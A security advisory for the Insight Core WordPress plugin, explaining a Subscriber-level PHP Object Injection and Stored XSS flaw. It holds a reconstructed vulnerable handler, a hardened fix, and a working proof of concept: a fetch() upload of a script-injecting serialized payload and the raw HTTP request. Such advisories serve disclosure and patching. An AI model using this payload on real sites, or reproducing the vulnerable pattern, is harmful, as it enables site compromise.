
wpexploit | Krzysztof Zając | WPEX-ID:01D430EA-EF85-4529-9AE4-C1F70016BB75
History: Dec 28, 2021 - 12:00 a.m.

Insight Core <= 1.0 - Subscriber+ PHP Object Injection & Stored XSS

Tags: insight core, php, object injection, stored xss, frontend pages, security exploit

EPSS: 0.001 (Percentile: 24.8%)

The plugin does not perform any authorisation or CSRF checks in the insight_customizer_options_import AJAX action (reachable by any authenticated user via admin-ajax.php), does not validate the uploaded file before passing its contents to unserialize(), and does not sanitise or escape the imported values before outputting them in frontend pages. As a result, a user with a role as low as Subscriber can perform PHP Object Injection (unserialize() of attacker-controlled data) as well as Stored Cross-Site Scripting attacks.
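The following is an added example, not Insight Core's own code: a minimal reconstruction of the vulnerable pattern the advisory describes (no capability check, no nonce, unserialize() on an uploaded file, value echoed unescaped into an inline stylesheet) next to a hardened handler for the same AJAX action. Everything except the insight_customizer_options_import action name is an assumption for illustration: the insight_example_* function names, the 'insight_options' option, the 'insight_import' nonce action and the background_color validation rule.

```php
<?php
/**
 * Added example, not the plugin's code. Function names, the 'insight_options'
 * option and the 'insight_import' nonce action are assumptions for illustration.
 */

/* ---------- Vulnerable pattern (do not deploy) ---------- */

function insight_example_vulnerable_import() {
    // No current_user_can(), no check_ajax_referer(): any logged-in user, or a
    // logged-in user's browser via CSRF, reaches this code.
    $raw  = file_get_contents( $_FILES['import-file']['tmp_name'] );
    // Object Injection: unserialize() instantiates whatever class the payload
    // names and runs its __wakeup()/__destruct() with attacker-chosen properties.
    $data = unserialize( $raw );
    // Stored XSS: the strings are persisted without validation or escaping.
    update_option( 'insight_options', $data );
    wp_send_json_success();
}
// wp_ajax_* hooks fire for every authenticated role, Subscriber included.
// add_action( 'wp_ajax_insight_customizer_options_import', 'insight_example_vulnerable_import' );

function insight_example_vulnerable_head() {
    $opts = get_option( 'insight_options', array() );
    // A background_color of "</style><script>...</script>" closes this block.
    echo '<style>body{background:' . $opts['background_color'] . '}</style>';
}

/* ---------- Hardened handler ---------- */

// Strict validator for the one value accepted here: a 6-digit hex colour.
function insight_example_valid_color( $value ) {
    return is_string( $value ) && 1 === preg_match( '/\A#[0-9a-fA-F]{6}\z/', $value );
}

function insight_example_hardened_import() {
    // 1. Authorisation: importing customizer options is a theme-settings change.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: the settings page embeds wp_create_nonce( 'insight_import' ) as "nonce".
    check_ajax_referer( 'insight_import', 'nonce' );

    if ( empty( $_FILES['import-file']['tmp_name'] )
        || ! is_uploaded_file( $_FILES['import-file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file', 400 );
    }
    $raw = file_get_contents( $_FILES['import-file']['tmp_name'] );

    // 3. Do not unserialize() user data. Prefer JSON (no objects are created);
    //    if the legacy serialized format must still be read, forbid class
    //    instantiation so only scalars and arrays come back (PHP >= 7.0).
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        $data = @unserialize( $raw, array( 'allowed_classes' => false ) );
    }
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'invalid import', 400 );
    }

    // 4. Allow-list keys and validate each value before storing it.
    $clean = array();
    if ( array_key_exists( 'background_color', $data ) ) {
        if ( ! insight_example_valid_color( $data['background_color'] ) ) {
            wp_send_json_error( 'invalid background_color', 400 );
        }
        $clean['background_color'] = strtolower( $data['background_color'] );
    }
    update_option( 'insight_options', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_insight_customizer_options_import', 'insight_example_hardened_import' );

function insight_example_hardened_head() {
    // 5. Escape on output as well, so a bad value that reaches the option by
    //    another route (older import, direct DB edit) still cannot break out.
    $opts  = get_option( 'insight_options', array() );
    $color = isset( $opts['background_color'] ) ? $opts['background_color'] : '';
    if ( insight_example_valid_color( $color ) ) {
        echo '<style>body{background:' . esc_attr( $color ) . '}</style>';
    }
}
add_action( 'wp_head', 'insight_example_hardened_head' );
```

Against the hardened handler the PoC request below fails three times over: a Subscriber is stopped by the capability check with a 403, an administrator without the nonce is stopped by check_ajax_referer(), and even a nonce-bearing administrator cannot store the payload because it is not a hex colour. The output escaping is there only as defence in depth; the fix that matters for the Object Injection is the removal of unserialize() on attacker-controlled bytes.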

// PoC: upload a serialized PHP array as the "import-file" of the
// insight_customizer_options_import admin-ajax action. Run it from the browser
// console of any logged-in user (Subscriber is enough); the session cookie is
// sent automatically because the request is same-origin.
// The serialized string length must equal the byte length of the value exactly
// (s:38 for the 38-character payload below), otherwise unserialize() fails.
let formData = new FormData;
formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:38:"</style><script>alert(/XSS/);</script>";}']))
formData.append('action', 'insight_customizer_options_import');
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "body": formData,
  "method": "POST"
})
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771
Content-Length: 458
Connection: close
Cookie: [any authenticated user]

-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="import-file"; filename="blob"
Content-Type: application/octet-stream

a:1:{s:16:"background_color";s:38:"</style><script>alert(/XSS/);</script>";}
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="action"

insight_customizer_options_import
-----------------------------189498983625966260651015514771--


The XSS is triggered on all frontend pages: the imported background_color value is echoed unescaped into an inline <style> block, which the payload's leading </style> breaks out of before injecting the script.

